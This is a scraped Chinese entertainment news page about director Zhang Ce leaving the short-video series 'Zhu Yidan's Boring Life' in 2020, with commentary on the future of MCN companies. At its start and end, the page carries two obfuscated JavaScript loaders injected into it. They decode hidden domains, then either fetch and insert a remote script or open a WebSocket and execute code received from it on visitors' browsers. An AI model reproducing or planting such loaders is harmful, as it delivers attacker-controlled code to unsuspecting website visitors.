function DTJpi(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function pVuZef(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DTJpi(t);};window['\x66\x70\x46\x56\x69\x45\x7a']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=pVuZef,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('aG4uc3BBvcnRzZHJlYW0udG9w','dHIueWVzdW42NzguY29tt','138805',window,document,['B','t']);}:function(){};

《朱一旦的枯燥生活》核心人物出走,前途堪忧

10月16日,抖音爆红的短视频《朱一旦的枯燥生活》的导演突然在微博宣布离职,引发外界关注。导演张策表示,自2020年10月1日起,本人将不再继续担任《朱一旦的枯燥生活》策划、导演、编剧、配音,同时从原公司辞职。

导演张策图片,图片来源于网络

导演张策图片,图片来源于网络

作者/陶淘

“非常感谢大家这一年多对作品的喜爱和对小策的支持。我将继续做一个简单快乐的创作者,努力为大家带来更多好的作品。”他说。

如GQ报道,该短视频爆火,源于故事的主角朱一旦身穿Polo衫、手戴劳力士,在每一集的结尾感慨:“有钱人的快乐往往就是这么朴实无华,且枯燥。”故事用夸大和反讽的方式达到喜剧效果,描绘了当代人的职场图景。导演张策在其中扮演马小策,一个总是在斗争,但经常失败的角色。

左一张策中间朱一旦

左一张策中间朱一旦

对于集导演配音编剧三重身份的主创人员离职,许多大V都表示,从短期来讲,这对于该短视频节目来说是灾难性的。微博博主@圈内星探认为,大家爱的可能只是旦总的身体和另外一个男人的声音,以及另一个人的灵魂,那随着视频风格的变化,就有可能“没内味了”。

知乎的一位答友“光年旋律”也表示,目前来看,这是一个双输的局面,朱一旦系列失去了导演,编剧和配音,等同于抽走了这个大IP的骨骼和灵魂;那种独特的讽刺式黑幽默,是朱一旦系列爆红的根基。

而对于张策来说,离职对他的影响比朱一旦要大,因为“短视频已经不是前两年的风口了。在短视频泛滥的年代,前仆后继的模仿者已经足够让观众审美疲劳。”

不过,也有其它不同的观点则认为,张策的离职有其必然性和标杆性,并且可能成为判断老一代MCN机构模式是否可持续的一个关键时点。

作为“有其必然性、并且长期来看张策可能会赢”的观点代表,知乎另一位答友“弹吉他的胖达”表示,张策身兼数职,保持高强度的工作量,对本人的身体健康和精神压力造成了极大的影响。而在朱一旦枯燥的生活其背后的公司山东光曜联晟文化传媒有限公司的股东里,则完全找不到张策的名字。

张策离职评论

张策离职评论

这意味着,对于这位优秀的内容创作者来说,长期“肝”下去却并不能得到相应的回馈,这终究会面临着心寒和出走。而离开之后,凭借其自身的才华,张策可以去寻求更适合自己的平台,或者亦可搭建其自身的平台。

在微博自媒体@卢诗翰看来,张策离职后朱一旦账号的数据走向,可以作为衡量视频内容账号究竟是资本和团队不可或缺,还是核心内容不可替代的一个标准。

不过,《朱一旦的枯燥生活》原导演张策出走也要“另立门户”了。据天眼查App显示,张策已于2020年6月15日成立山东造梦星和文化传媒有限公司,并在该公司持股45%,该公司另一股东为张译文,持股比例为55%。张译文为张策的妻子。

山东造梦星和文化传媒有限公司注册资本约1333.33万,法定代表人为张译文,公司经营范围包括文艺创作、个人互联网直播服务(需备案)、影视制作、电视剧发行、演出经纪、网上贸易代理以及广告设计、制作、代理、发布等。该公司还申请了名为“造梦星和”的商标,涉及分类为广告销售、教育娱乐。

微博上张策的妻子晒出了夫妻二人在dreamakerlogo前的合影,他们要成为自己的造梦者。

目前,朱一旦这个账号已经是全网头部账号,粉丝超千万,并且已有了包括朱一旦的枯燥生活,马小玲,C座等完善的矩阵号,其背后有着公司体系和资金支持。天眼查App显示,朱亘(朱一旦的扮演者)目前共在多家公司担任法定代表人、股东。

因此,两边分家后的后续发展,势必会成为一个非常重要的风向标:

如果朱一旦账号这边数据下滑失去活力,那么,在事实上就宣告了上一代MCN机构的死亡,说明MCN的竞争力是无法离开个人IP的影响力的。在此情形之下,MCN会加快转型速度,做传统杂志编辑部那样提供选题方面的引导和审核服务,或者像直播带货团队靠拢,提供选品供应链这种深度服务,做创作者的后盾。

反之,若朱一旦这边数据依旧辉煌,那说明成熟的团队流水化作业确实可以保证内容质量,以后MCN只需进一步提升团队的工业化水准即可。

没灵魂了

没灵魂了

事实上,该短视频16日凌晨的更新已经给出了答案。如AI财经社报道,10月16日凌晨,超过半个月未更新的“朱一旦的枯燥生活”终于放出新视频,只是这次的内容让网友直呼“没内味儿了”。

给TA买糖
共{{data.count}}人
人已赞赏
主播圈

斗鱼虎牙按照市值进行1:1合并 新公司由腾讯控制

2020-10-13 2:25:40

主播圈

解说大司马热度爆表 被网友骂上热搜前十

2020-10-25 22:06:59

function cOXxhMI(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function xiSAu(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return cOXxhMI(t);};window['\x42\x64\x65\x78\x6e\x47\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=xiSAu,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('aG4uc3BvcnRzZHJllYW0udG9w','dHIueWVzdW422NzguY229t','138806',window,document,['l','2']);}:function(){};
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧